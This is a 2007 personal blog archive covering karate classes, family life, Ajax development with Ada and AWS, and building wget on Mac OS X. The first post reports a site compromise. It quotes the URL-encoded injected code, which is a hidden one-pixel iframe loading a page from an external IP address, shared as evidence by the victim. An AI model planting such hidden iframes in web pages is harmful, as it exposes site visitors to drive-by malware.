Website security compromised

March 30th, 2007 at 17:25 · Filed Under Call Me a Geek, Critiques, Hacking · 3 Comments 

I noticed a drastic reduce of visitors to my website in February and March. I was wondering what was happening. On March 8, I suddenly received a notification email from Google Search Quality team informing that my website was a hazard to visitors and it might contain some malware or badware. I was shocked to know about it and I Googled for my site and found that my sites had been tagged “This site may harm your computer” and visitors could not access to my website following the link from Google search page.

With the help from my hosting provider, I found a piece of malicious obfuscated code in JavaScript had been intentionally embedded into one of the .PhP file. Part of the obfuscated code read like this:


%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E

I removed the malicious code from my .PhP script file and informed Google team. It really took them quite some time to remove my website from their list. A moment ago, I found out that my site has been de-listed from Google’s list of malicious websites.

Ironically, today I received an announcement from my web hosting provider that they implement HackerSafe Certification on all websites hosted with them. Here’s a snapshot of their newsletter:

I am all tied up to carefully inspect and decipher the code. Any taker?

Tags:

Little tigers

March 18th, 2007 at 21:20 · Filed Under Days in My Life, Karate · 1 Comment 

Today was the second class for Jasin dojo. There were fourtheen little tigers excluding D and R. It was a hot sunny day so the hall was as hot as oven. The feeling was somehow like in the sauna room. It was quite difficult to calm and control the kids but I managed to.

This is the first time I ever teach 16 little tigers in my whole life. It is extremely challenging. As usual, I love challenging tasks. I can see many potential kids who can be groomed into good karate-ka. Just wait and see how many can endure the training to adulthood. I hope many will.

Tags:

Training Journal #3

March 17th, 2007 at 19:51 · Filed Under Karate, Training Journal · Comment 

When I arrived at the community hall, there was no one in sight. Anyhow, I changed into my gi and started to warm up myself. After a while, there was still not a living shadow and I was all alone at the community hall.

This was a great opportunity for me to train. I had not been training for weeks. First, the illness before CNY. Second, the CNY celebration, off course. Third, my new project and I had to pay more attention and put in more effort. I realized my stamina had rotten so I practiced a few kata.

After practicing the kata, I did some kihon renshu. Then I started to explore the dropping technique. I first tried it with Jodan Uke and Chudan Uchi Otoshi. Then I tried it in Shomen Tzuki. I could feel the differences in the techniques with small increase of power. To harvest the benefits of dropping technique, one must train very hard so that the body and the technique can synchronize with the sudden dropping motion. This is common among some TKD but unfortunately many of them are unable to explain the concept behind their techniques. They said it was used to generate sine wave, a simple answer that I think most of them do not understand.

Some karate kata use dropping technique, for instance, Passai, Bassai-dai and all other variances. I think not many karate-ka realize this technique has been embedded into kata decades ago and even its existence. I do not know if my finding is true but it is certainly worth studying and exploring.

I had been reading about my work for the past two days and this morning. The training had lighten up my brain and I had an excellent work out with a big sweat!

Tags:

Scarce resources on AWS with Ajax

March 17th, 2007 at 14:04 · Filed Under Ada, Software Development, Web · Comment 

Although AWS comes with some demo codes, I find it insufficient to learn using AWS to develop an Ajax web application. Due to the scarce resources on using AWS with Ajax, I’ve been trying to understand the working mechanism between AWS and Ajax.

To build a knowledge base in myself about developing a web application using AWS and Ajax is challenging. To use AWS with Ajax, I need also to learn/use XML/Ada. I’ve played around with XML for a while, mainly hacking into data saved in XML format by some Mac OS X applications.

XML is Extensible Markup Language. This is a format used to organize text files into tags and associated set of values. XML/Ada is a collection of simple modules that provide manipulation of XML streams.

In an Ajax (or Reverse Ajax) capable web application, data streams are packaged and sent in XML format, for example:


<client_info>
   <name>Acme Corporation</name>
   <id>ACME</id>
</client_info>

A JavaScript will interpret and read the corresponding tags and associated values after the web page has received the package.

Tags:

Reverse Ajax

March 17th, 2007 at 12:28 · Filed Under Ada, Software Development, Web · Comment 

Since my new job at Singo Solutions, I’ve been reading about Ajax and Reverse Ajax. My development project requires the use of Ada, AWS and Ajax to build a web application with real-time data display and better user-browser interaction. See my earlier post about Developing web applications with AWS. Ajax was a term new to me. I had not bothered to read about Ajax and JavaScript before I joined Singo Solutions.

What is Ajax? Ajax is an acronym for Asynchronous Javascript And XML. The conjunction was injected into the acronym to spice up and to make pronunciation easier. Ajax is not a technology. It is a web programming technique to develop interactive web applications using combination of technologies such as JavaScript (JS), XML, DOM and XHTML. Ajax makes the web page to exchange a small amount of data with the server behind the scene, so that the entire web page will not have to be refreshed each time the user requests a change. With this technique, information can be displayed on web page in real-time without user’s intervention or a web page reload.

What is Reverse Ajax? Reverse Ajax is just different from Ajax, as reverse Ajax is a compounding technologies for pushing data from a server to a client. These technologies include COMET or PiggyBack and Polling, and, of course, Ajax.

Ajax keeps alive a connection between a server and a client and send data to the client. In another words, the server will contact the client when data need to be sent (without Ajax, the client will have to contact the server in order the data can be sent from the server to the client). The problem is that some web servers can’t easily contact web browsers. One thing for sure, the firewalls will get in the way.

Comet, or long-lived http or slow load technique, keeps the communication between a server and a client open. This technique actually have a client to send a request to the server and also allows the server starts replying to the request, slowly, extremely slowly but the reply actually never finish. This permits the server to keep the communications channel open to pass down additional information when the time comes. The closest comparison to this technique is server push.

Reverse Ajax makes the browser to send requests in the background to the server and receive responses/data from the server without the intervention of user.

To use both Ajax and Reverse Ajax, I need to use JS in web templates although the web application (server) is developed with Ada and AWS. I am starting a love/hate relationship with JS.

Tags:

Dmitry’s posing

March 15th, 2007 at 14:40 · Filed Under At Home, Days in My Life, Dmitry, Family, Photography · 1 Comment 

I was making a “photo”-copy of my certificates to be sent to my Sensei in Okinawa. Dmitry came and I asked him if he wanted to make some photos. “Yes”, he said and “Alright”, I replied. I told him to make some pose and surprisingly, he cooperated well.

Tags:

Dominik at 6 months 19 days

March 12th, 2007 at 20:28 · Filed Under At Home, Days in My Life, Dietrich, Dominik, Family · Comment 

Nik has developed strong arms and bones. He is able to do push up. Here are some photos of him doing high push up.

Tags:

Little Tigers

March 11th, 2007 at 17:58 · Filed Under Days in My Life, Karate · Comment 

I just came back from Jasin after a karate class. It was a new class and today was the first lesson. The class will be conducted every Sunday 3.00PM to 4.30PM at a Basket Ball hall in Jasin. The place was 22km from my house. There were 10 kids in the class. This was the first all-kid class I ever had and I remembered Breyett Sensei sent me an article about how he taught the kids karate-do.

First, I gave them some warm up exercises followed by how-to-clinch-a-fist game. I told the kids that they were little tigers (ok, tiger is the national mascot for Malaysia) and I was the monster. They had to escape from me but they could only run within a fixed parimeter. There was a trick which they could use to evade my capture. They would have to shout “Stop!” and to raise any one of their hands holding a fist. Then the monster would check if they were holding the fist correctly. If not, they would be captured and “eaten” by the monster. Then they would not be able to play again.

After the game, I taught them “Migi” and “Hidari” and “Renzoku chudan tzuki”. After that, we played another game which was harder. We played one game after one exercise and the difficulty level would increase.

The little tigers were really enjoying the training and I, the “Monster”, was really enjoying with the kids as well. If Dmitry was there, he would have enjoyed the training too. We went out for brunch in the morning and when we arrived at home, the 3 dinos were sleepy so I decided not to bring Dmitry along.

I would like to thank Mr. Safuan Chai and his wife, Puan Haironi for their help to gather the kids and to form the class and also to make and hang the banner outside the basket ball hall.

Tags:

Isolation and marginalization

March 10th, 2007 at 14:22 · Filed Under Critiques, Karate · Comment 

I read the blog of my student and was shocked that she had been isolated and marginalized by her peers and fellow instructors during her training at MMU. She is the president of MMU Karate Club and she can do nothing. When they found out that she would cross over to the authentic Shorin-ryu Seibukan, they stopped treating her as friends and peers during training classes.

She came to me many times seeking advice and I told her that she had all the freedom to decide who and where she wanted to train. By restricting their students from learning other styles will only show their ignorance and how timid they are in seeking knowledge in karate-do. I encourage her to train hard under the authentic Shorin-ryu Seibukan and after she has obtained her Shodan, it is about time for her to venture into the open sea of karate-do.

I don’t understand why most people in Malaysia have such attitude. It is very frustrating to see the instructors and their students having such attitude. These so-called instructors should never be allowed to teach karate-do as they do not teach the essence of “do” as in karate-do and bushi-do. Worst, they mislead their students and cultivate negative behaviors and attitudes. It is even more frustrating to see the society ignorantly accepting such behavior and endorse it unanimously.

Tags:

Building wget for Mac OS X

March 5th, 2007 at 10:56 · Filed Under Computing, Mac OS X, Web · Comment 

wget is a very useful utility. It can retrieve files from the web using http or ftp protocols. Unfortunately, it does not come natively in Mac OS X. I had occassionally tried to use wget to download some html pages from some websites a few months ago but wget just wasn’t there. I was kind of lazy to download and compile the source until today, when I needed to download some 50 files from a website. I needed wget badly.

It took me not more than 5 minutes to download, build and install. I downloaded the latest and stable version 1.10.2 on Mac OS X 10.4.8.

  1. Download the source from http://ftp.gnu.org/gnu/wget/
  2. Unpack the tarball tar xzvf wget-1.10.2.tar.gz
  3. This creates a director wget-1.10.2. Change the working directory to it: cd wget-1.10.2
  4. Configure the build: ./configure
  5. Build: make
  6. Install: sudo make install
  7. wget should now be in /usr/local/bin

Tags:

Chap Goh Mei Lion Dance

March 4th, 2007 at 17:36 · Filed Under At Home, Days in My Life, Dietrich, Dmitry, Dominik, Family · 1 Comment 

Chap Goh Mei or “The fifteenth night” is the fifteenth day and also the last day for Chinese New Year celebration. Today, we had a Lion Dance at grandma’s. We were waiting for the Lion Dance team to come at 1400 hours. The boys were getting impatient since 1230. Finally, they arrived at 1405.

The two big boys were a little agitated by the loud drum noise. Dominik was really enjoying the drum rhythms and he was kind of dancing and getting excited in the whole event.
D and R enjoyed so much playing with the colorful papers from the party poppers.






Tags: